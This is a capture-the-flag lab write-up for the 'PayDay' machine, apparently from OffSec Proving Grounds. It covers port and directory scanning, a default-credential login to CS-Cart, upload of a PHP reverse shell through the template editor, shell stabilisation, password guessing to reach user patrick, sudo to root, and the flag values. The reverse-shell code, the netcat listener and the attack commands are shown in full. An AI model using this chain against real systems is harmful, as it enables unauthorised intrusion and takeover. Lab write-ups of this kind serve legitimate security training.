PayDay
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.222.39
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 20:34 +03
Nmap scan report for 192.168.222.39 21:28:55 [188/523]
Host is up, received echo-reply ttl 61 (0.14s latency).
Scanned at 2025-10-02 20:34:45 +03 for 205s
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJedhI7AqO17xYjoo1RT33T4x4g7b+u71OK2CNJW//eoNBEibTyvqAmBDobETDcAZXHMdEMTvINlM7ZjGV4EAhfE57Fkkhae8LvML3Ae0OVsa/l4pWizwGEEkHVujayyHZlwqXnK1ePV9r
Knc6VJUYL4yHPMEwhNDme92hxlEWBbAAAAFQCyn5tJyWy2EZXJLQgS/xpiBH36uQAAAIBcUdaW5kLYjbgbalp1Z3cMQuuiG/YhaLxNBMh75vM/SrrsATeqEIUlBNBgDel+fUSPbr2iCQ+I8xrk6CNvcXtugMfJSF78pH42VN5GrL
KzNZeoyGzywEhcFKHAqcRMntyEZJ/BiLWRunRcnKznMMa00/d3xRLvTFKUmUjdW1IebAAAAIBRhyvDlRI873HIhNd8GiXY/kZyL+jDQle8ULF1Lk+H+EzKXMSPt0gMv8z2bpSD1XIB565rcFWlO+7q0BZFY+NLJAhMWAWxBE4Ib8
7uPUqeGvg6D8w6gZur84lpMg7P1KjyihIfY5tMCwfKkkaS418IPzhKtDUvtI0Vr6h3Wv0luA==
| 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzGacK6NGRpMIVjkA/xYbfKDgeJeQzkJl25og4nQl+FV4ZbvXv6h0vCU+E8SPHKPL/WJAIqmL6hdQaTQiTDmhcKjecWBq9fX1Esb8cvlOPEzphl+wESfJx/lWYvLPBXz0ZdKfy2
/O+0an9ua6jl3tDEFzeosHwIF8zDbaBL6/RzBV+0gkzA67OowtcaxoioYYPzsEaOAkAFjlaRMviUA3nzCvffG61KyqmAdwodl+rXyI4KHjQqinPYk5qmj9rO8LcLE/gWVRoRw4va6hbJ2V7e74Tt1HQ4V/FzhG1zrWdkI/qA65RM
Cw/0270w1PjYkfYl2ENJL6YHHosf4NCkfdbw==
80/tcp open http syn-ack ttl 61 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
110/tcp open pop3 syn-ack ttl 61 Dovecot pop3d
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_pop3-capabilities: RESP-CODES STLS TOP UIDL PIPELINING CAPA SASL
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap syn-ack ttl 61 Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
|_imap-capabilities: completed THREAD=REFERENCES IDLE LITERAL+ OK IMAP4rev1 STARTTLS Capability LOGINDISABLEDA0001 UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPE
ND CHILDREN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap syn-ack ttl 61 Dovecot imapd
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_imap-capabilities: THREAD=REFERENCES IDLE LITERAL+ AUTH=PLAINA0001 IMAP4rev1 completed Capability OK UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPEND CHILDREN
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
995/tcp open ssl/pop3 syn-ack ttl 61 Dovecot pop3d
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_pop3-capabilities: RESP-CODES TOP UIDL USER PIPELINING CAPA SASL(PLAIN)
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after: 2008-05-25T02:02:48
| MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHTTP (80):
I will start with port 80 by running gobuster:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ gobuster dir -u http://192.168.222.39/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.222.39/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
<snipped>
/addons (Status: 301) [Size: 335] [--> http://192.168.222.39/addons/]
/admin.php (Status: 200) [Size: 9483]
/admin.php (Status: 200) [Size: 9483]
/admin (Status: 200) [Size: 9483]
/catalog (Status: 301) [Size: 336] [--> http://192.168.222.39/catalog/]
/cgi-bin/.html (Status: 403) [Size: 313]
/cgi-bin/ (Status: 403) [Size: 308]
/chart (Status: 200) [Size: 0]
/chart.php (Status: 200) [Size: 0]
/classes (Status: 301) [Size: 336] [--> http://192.168.222.39/classes/]
/config.php (Status: 200) [Size: 13]
/config (Status: 200) [Size: 13]
<snipped>
/index (Status: 200) [Size: 28074]
/index.php (Status: 200) [Size: 28074]
/index.php (Status: 200) [Size: 28074]
<snipped>
/install (Status: 200) [Size: 7731]
/install.php (Status: 200) [Size: 7731]
<snipped>
/skins (Status: 301) [Size: 334] [--> http://192.168.222.39/skins/]
<snipped>
Progress: 18452 / 18452 (100.00%)
===============================================================
Finished
===============================================================We will find some appealing files and directories.
Explore the website:
We will see it is running cs-cart template.
Skins directory has directory listing, also misconfigured to show the underlying operating system and the webserver running it:
We can find the exact version of that application if we naviagted to install.php:
Or by checking the last update to the copyright:
Exploitation:
One of the vulnerabilities this version is vulnerable to is authentcated RCE, lets check it out:
As stated in one of the github comments:
Visit "cs-cart" /admin.php and login (Remember: You need to login on ADMIN section not on the regular USER section).
Under Look and Feel section click on "template editor".
And under that section, upload your malicious .php file, make sure you rename it to .phtml before you upload.
If successful, you should be able to get a RCE.
We can try some combinations of default passwords, such as admin:admin, etc. Or we can search online for the default credentials for cs-cart.
admin:admin worked for me:
Then we will click on template editor under look and feel:
We will upload php reverse shell, but first edit it to add my own IP address and the port, and change its extension to phtml as mentioned in the github comment:
┌──(kali㉿kali)-[/usr/share/webshells/php]
└─$ cp php-reverse-shell.php ~/Desktop/CTF/Machines/OffsecPG/Practice/Payday/shell.phtml
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ cat shell.phtml
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.177'; // CHANGE THIS
$port = 443; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;Browse the files by pressing the browse button, and the select the file, and click on upload:
Is we can see it is uploaded under /skins/ directory that we discovered before with the use of gobuster.
Before opening it, we will start a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ nc -nlvp 443
listening on [any] 443 ...Click on shell.phtml:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.177] from (UNKNOWN) [192.168.222.39] 42047
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
13:57:04 up 25 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@payday:/$ export TERM=xterm
export TERM=xterm
www-data@payday:/$ ^Z
zsh: suspended nc -nlvp 443
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 443
www-data@payday:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@payday:/$ stty rows 43 cols 172Lateral Movement to patrick:
After doing some local enumeration, we will find there is a user called patrick on the machine:
www-data@payday:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
<snipped>
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bas
www-data@payday:~# ls -la /home
total 12
drwxr-xr-x 3 root root 4096 2016-04-12 07:33 .
drwxr-xr-x 21 root root 4096 2008-04-24 22:02 ..
drwxr-xr-x 2 patrick patrick 4096 2020-03-25 10:25 patrickI will try the password as the username:
www-data@payday:/$ su patrick
Password: patrick
patrick@payday:/$We are patrick.
Or we can brute force the password using different tools such as, hydra, medusa, ncrack, etc.
Privilege Escalation:
Lets check if patrick can run any command with sudo:
patrick@payday:/$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick: patrick
User patrick may run the following commands on this host:
(ALL) ALLSo we can run all commands as sudo, which will help us su to root:
patrick@payday:/$ sudo su
root@payday:/#Get the flags:
root@payday:~# cat proof.txt
4df293678a81880268b8796be4bc2b20
root@payday:~# cat /home/patrick/local.txt
6e520701348836197df61cbafd055febLast updated